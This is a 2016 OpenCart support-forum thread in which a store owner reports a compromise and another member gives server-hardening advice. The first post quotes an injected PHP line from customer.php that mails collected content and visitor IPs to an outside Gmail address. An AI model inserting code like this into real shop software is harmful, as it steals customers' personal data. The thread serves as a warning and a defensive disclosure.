Post by labeshops » Sun Dec 11, 2016 10:18 am

Had an attempted hack that added a bunch of symlinks and also found a line embedded in opencarts system/library/cart/customer.php file

Code: Select all

"mail('wuroikya@gmail.com', '♥ Talghima Gra3 [  '.$_SESSION['country1'].'  -  '.$_SERVER['REMOTE_ADDR'].' ]', $content,$head);
     } "
I assume they were trying to steal customer information considering it was in that file. It broke the store so found it pretty fast in that file but wanted to let everyone know to watch out for this. I deleted all the symlinks and cleared caches and everything is fine again, but definitely watch out for it. Also changed all my passwords of course.

Running Opencart v2.2 with multi-stores from http://www.labeshops.com which has links to all my stores.

Image


User avatar
Expert Member

Posts

Joined
Thu Aug 04, 2011 4:41 am
Location - Florida, USA

Post by angela » Sun Dec 11, 2016 5:11 pm

If there's a file in your site that you didn't put there, that wasn't an attempted hack; it was a hack.

Do you know how they were able to get that file onto your server? (If you're on a shared server, your host would know the method of operation).

If it were through OpenCart and not an unpatched OS/php version, a fix needs to be implemented to all of our carts asap.

User avatar
New member

Posts

Joined
Fri Dec 02, 2016 2:14 am

Post by labeshops » Wed Dec 14, 2016 2:43 am

I said "attempted" since the hacker fouled up the code they tried to inject and it just caused an error rather than their getting any info.

Suspect they came thru wordpress even though I had wordfence and other security installed. Found some files in each of my 4 wp installations that I removed.

I just moved to a VPS and isolated my wordpress installations on their on cpanels away from my opencart installation. I had actually planned to go to a vps early next year, so just did it a little earlier than planned. Also rolled back to before the hack occurred, all with a big thanks to Evolve for helping me work thru the issue. Great support as always.

Running Opencart v2.2 with multi-stores from http://www.labeshops.com which has links to all my stores.

Image


User avatar
Expert Member

Posts

Joined
Thu Aug 04, 2011 4:41 am
Location - Florida, USA

Post by angela » Wed Dec 14, 2016 2:53 am

Oh I see, sorry - didn't really look their code. :)

(Assuming this is your first VPS/dedicated server and you're on a Linux-based OS):
Now that you're on a VPS the onus is on you to keep the OS up-to-date, as well as any dependencies.
If you have a WHM account that'll simplify things greatly for you as you can do pretty much everything, short of OS & kernel updates from within the WHM admin.

If you don't already have it, utilizing CSF, logwatch, rkhunter and clamAv are good starting points.
Also disable expose_php via php.ini
Turn off Apache server tokens
If you're willing to invest a bit of time testing, mod_security as well; but you'll need to thoroughly test your cart. Out of the box a lot of rules are triggered by OpenCart.

https://www.linode.com/docs/security/se ... frequently
https://documentation.cpanel.net/displa ... -+Security

WordPress would be my first guess at entry too. Definitely keep it (and all add-ons) up-to-date & isolated.

Side note: Simply creating a separate cpanel account for the Wordpress installs won't guarantee they're isolated; make sure permissions are set properly (no chmod 777!) and disable shell access for them.

User avatar
New member

Posts

Joined
Fri Dec 02, 2016 2:14 am
Who is online

Users browsing this forum: No registered users and 6 guests